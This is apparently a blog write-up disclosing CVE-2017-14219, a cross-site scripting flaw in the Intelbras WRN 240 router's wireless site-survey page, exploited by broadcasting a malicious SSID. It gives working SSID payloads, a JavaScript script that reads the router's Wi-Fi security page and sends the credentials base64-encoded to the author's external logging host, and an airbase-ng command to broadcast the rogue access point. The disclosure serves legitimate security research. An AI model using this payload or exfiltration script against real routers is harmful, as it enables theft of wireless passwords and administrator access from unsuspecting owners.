Router exploit: Getting Wireless Password and Administrator Session Without Being Connected on the Same Network.

[CVE-2017–14219] XSS IN INTELBRAS ROUTER WRN 240.

Follow-me: https://twitter.com/Elber333

How it started:

Have I been trying to hack my router for some time, reasons? Just missing what to do, and sometimes lack of internet too, this was from attempts to upload with modified firmware to attempts to insert codes on the page by changing the wireless ID, until one day I observed the SSIDS of other wireless points in the list interception of wifi networks.

XSS:

The vulnerability is present in the Intel Wireless Router N 150Mbps WRN 240 (only version tested by me so far) on the router search page to use as a bridge.

URL: "http://10.0.0.1/userRpm/popupSiteSurveyRpm.htm"

Image for post
Image for post

The router receives the SSID from the networks and then shows it on the screen without any type filter or sanitize *, obeying only the limit of 32 characters of the wireless. The vulnerable page is not active by default on the router, the user (victim) would have to activate it in the AP settings, but luckily (of course), we just need the logged in user to access the html where the system shows the networks wireless devices that are within reach. Action that would not be difficult for someone smart.

Image for post
Image for post

To raise the AP I used another router that I had, but nothing that an airbase-ng would not solve. I changed my SSID to:

<script>alert(‘xss’)</script>

An attempt that did not succeed, but changed again to
</script><script>alert(‘xss’) where the tag would close the first </script> and start a new one, taking advantage of the original <script> tag at the end of the file.

Now that we have our xss, let’s go to the part that really matters. Obeying the 32-character limit of the wireless SSID, a way to inject long codes into the page would be importing from somewhere else, so I changed the SSID to <script src=‘// elb.me’> “elb.me” is my domain that I am using to save payloads.

We know that to access the index of a page does not necessarily need /index.*** in the end, so I added my script in the index of “elb.me” In a technique of theft of cookies, we usually use a script in php which takes what is passed by GET and saves it to a log file, it will not be much different from what we’re going to do. The script in PHP I configured in https://elb.me/cookie.php?ck= “logs are saved in https://elb.me/cookie.txt

The router saves the password in an ajax located on the page http://10.0.0.1/userRpm/WlanSecurityRpm.htm we only need the source of that page to get the credentials In the “elb.me” index I inserted a script in XMLHttpRequest, which allows you to request the source of this page and send it to our PHP receiver.

var rawFile = new XMLHttpRequest();
rawFile.onreadystatechange = function() {
alert(rawFile.responseText);
var base64 = rawFile.responseText.split('>')[1].split("/SCRIPT")[0];
// selects the part of the page with the credentials
new Image().src="https://elb.me/cookie.php?ck="+btoa(base64);
// sends the credentials encoded in base64
};
rawFile.open("GET", "http://10.0.0.1/userRpm/WlanSecurityRpm.htm", true);
//take the page source /popupSiteSurveyRpm.htm
rawFile.send();

Now that we have our payload, we just suburm an AP and wait for someone to open the router page, or we can send the direct access link “http://10.0.0.1/userRpm/popupSiteSurveyRpm.htm".

Testing on the page I get the following result:

Image for post
Image for post

Our script worked :)

Now we just need to go to the page where the saved form logs, “https://elb.me/cookies.txt"

Image for post
Image for post

And after decodarmoso base64 we get our password.

Image for post
Image for post

Airbase command:

airbase-ng -e “</script><script src=’//elb.me’>” -c 8 -v wlan0mon

Text translated by google translator, and fuck.

Written by

Pentester , CTF player, Bug Hunter & Security Researcher \nTwitter: https://twitter.com/elber333

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store